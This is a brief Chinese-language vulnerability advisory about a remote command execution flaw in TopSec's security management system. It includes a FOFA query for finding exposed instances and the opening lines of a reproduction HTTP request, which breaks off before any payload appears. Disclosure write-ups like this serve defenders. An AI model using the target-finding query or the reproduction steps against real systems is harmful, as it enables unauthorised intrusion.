漏洞描述
` 天融信TopSec 安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等应用价值。
该系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。`
资产测绘
FOFA:title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"
漏洞复现
GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: 10
User